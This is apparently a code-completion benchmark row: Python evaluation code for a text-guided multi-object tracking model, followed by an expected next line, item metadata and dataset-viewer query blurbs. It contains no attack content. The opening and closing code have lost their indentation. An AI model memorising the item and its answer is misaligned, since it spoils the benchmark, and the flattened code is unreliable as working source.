un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
images = data['cropped_images']
images = images.repeat_interleave(len(expressions), dim=0)
# forward
inputs = dict(
img=images.cuda(),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs).cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
imgs = un_norm(inputs['img'])
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
return PRECISION, RECALL
def test_accuracy(model, dataloader, save_img=False):
    """Evaluate classification accuracy using both local and global crops.

    Iterates `dataloader` (batch size must be 1); each sample carries
    comma-separated expressions and binary labels. Both the local (cropped)
    and global views are replicated once per expression, and a logit >= 0 is
    treated as a positive prediction. Optionally dumps the tiled
    (local, global) image pair per expression to disk.

    Returns (precision, recall) in percent.
    """
    model.eval()
    TP, FP, FN = 0, 0, 0
    assert dataloader.batch_size == 1
    if save_img:
        save_dir = join(opt.save_dir, 'images')
        os.makedirs(save_dir, exist_ok=True)
        global_idx = 1
        un_norm = get_transform('unnorm', opt, -1)
    with torch.no_grad():
        for data in tqdm(dataloader):
            # load: one sample per batch, several expressions per sample
            expressions = data['target_expressions'][0].split(',')
            labels = data['target_labels'][0]
            # forward: replicate both views once per expression
            inputs = dict(
                local_img=data['cropped_images'].cuda().repeat_interleave(len(expressions), dim=0),
                global_img=data['global_images'].cuda().repeat_interleave(len(expressions), dim=0),
                exp=tokenize(expressions).cuda(),
            )
            logits = model(inputs)['logits'].cpu()
            # evaluate: logit >= 0 counts as a positive prediction
            TP += ((logits >= 0) * (labels == 1)).sum()
            FP += ((logits >= 0) * (labels == 0)).sum()
            FN += ((logits < 0) * (labels == 1)).sum()
            # save images
            if save_img:
                local_img = data['cropped_images'].squeeze(0)
                global_img = data['global_images'].squeeze(0)
                # upsample the local crop to the global size so both views
                # can be concatenated into one grid
                local_img = F.interpolate(local_img, global_img.size()[2:])
                imgs = un_norm(
                    torch.cat(
                        (local_img, global_img),
                        dim=0
                    )
                )
                imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
                for i in range(len(imgs)):
                    file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
                        global_idx,
                        expressions[i].replace(' ', '-'),
                        labels[i],
                        logits[i]
                    )
                    save_image(
                        imgs[i],
                        join(save_dir, file_name)
                    )
                    global_idx += 1
    # NOTE: removed leftover debug `print(TP, FP, FN)` that polluted stdout
    PRECISION = TP / (TP + FP) * 100
    RECALL = TP / (TP + FN) * 100
    return PRECISION, RECALL
def test_tracking(model, dataloader):
    """Score every (track, expression) pair for final tracking results.

    For each batch, computes similarity logits between the local/global image
    pair and its expression, then records that score on every frame in the
    sample's [start_frame, stop_frame] range.

    Returns a nested dict: video -> obj_id -> frame_id -> expression -> [scores].
    """
    print('========== Testing Tracking ==========')
    model.eval()
    OUTPUTS = multi_dim_dict(4, list)
    with torch.no_grad():
        for batch_idx, data in enumerate(tqdm(dataloader)):
            # forward
            inputs = dict(
                local_img=data['cropped_images'].cuda(),
                global_img=data['global_images'].cuda(),
                exp=tokenize(data['expression_new']).cuda(),
            )
            similarity = model(inputs)['logits'].cpu()
            for idx in range(len(data['video'])):
                for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
                    frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
                    # `similarity` is already on the CPU, so no second .cpu()
                    # is needed before the numpy conversion
                    frame_dict[data['expression_raw'][idx]].append(similarity[idx].numpy().tolist())
    return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
    """Turn the per-frame scores from `test_tracking` into final results.

    Args:
        cls_dict: nested dict video -> obj_id -> frame_id -> expression -> [scores].
        data_dir: dataset root containing a `gt_template` directory.
        track_dir: directory holding raw tracker output (`gt.txt`/`predict.txt`).
        save_dir: output directory; recreated from scratch on every call.
        thr_score: minimum mean score for a box to be written to `predict.txt`.
    """
    template_dir = join(data_dir, 'gt_template')
    # start from a clean output tree
    if exists(save_dir):
        shutil.rmtree(save_dir)
    for video in os.listdir(template_dir):
        if video not in cls_dict:
            continue
        video_dir_in = join(template_dir, video)
        video_dir_out = join(save_dir, video)
        MIN_FRAME, MAX_FRAME = FRAMES[video]
        # symbolic link for `gt.txt`
        for exp in os.listdir(video_dir_in):
            exp_dir_in = join(video_dir_in, exp)
            exp_dir_out = join(video_dir_out, exp)
            os.makedirs(exp_dir_out, exist_ok=True)
            gt_path_in = join(exp_dir_in, 'gt.txt')
            gt_path_out = join(exp_dir_out, 'gt.txt')
            if not exists(gt_path_out):
                os.symlink(gt_path_in, gt_path_out)
        # load tracks: prefer the combined `all` file; otherwise merge the
        # per-class `car` and `pedestrian` files with disjoint object ids
        try:
            tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
        except (OSError, ValueError):
            # OSError: file missing/unreadable; ValueError: malformed rows
            # (was a bare `except:`, which also swallowed KeyboardInterrupt)
            tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
            if len(tracks_1.shape) == 2:
                tracks = tracks_1
                max_obj_id = max(tracks_1[:, 1])
            else:
                # NOTE(review): a single-row (1-D) car file is discarded here —
                # presumably intentional, but worth confirming
                tracks = np.empty((0, 10))
                max_obj_id = 0
            tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
            if len(tracks_2.shape) == 2:
                # offset pedestrian ids so they do not collide with car ids
                tracks_2[:, 1] += max_obj_id
                tracks = np.concatenate((tracks, tracks_2), axis=0)
        # generate `predict.txt`
        video_dict = cls_dict[video]
        for obj_id, obj_dict in video_dict.items():
            for frame_id, frame_dict in obj_dict.items():
                for exp in EXPRESSIONS[video]:
                    if exp in EXPRESSIONS['dropped']:
                        continue
                    if exp not in frame_dict:  # TODO: possibly removable
                        continue
                    exp_dir_out = join(video_dir_out, exp)
                    score = np.mean(frame_dict[exp])
                    with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
                        if score > thr_score:
                            bbox = tracks[
                                (tracks[:, 0] == int(frame_id)) *
                                (tracks[:, 1] == int(obj_id))
                            ][0]
                            assert bbox.shape in ((9, ), (10, ))
                            if MIN_FRAME < bbox[0] < MAX_FRAME:  # TODO
                                # the min/max frame is not included in `gt.txt`
                                f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path): | model = get_model(opt, 'Model') | 1 | 2023-10-31 07:08:37+00:00 | 4k |
Subsets and Splits
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that have consistent code formatting levels across multiple scales (2k, 4k, 8k, 12k) and reveals the structured formatting patterns within these repositories.
SQL Console for tianyang/repobench_python_v1.1
Compares cross-file and in-file code structure patterns across different complexity levels, revealing how file organization strategies vary with code size and potentially informing better code architecture decisions.
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that have complete performance data across all seven code complexity levels, revealing consistent benchmarking patterns across different code sizes.
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that contain all 7 distinct quality levels (2k through 32k), revealing complete datasets that might be useful for comprehensive analysis.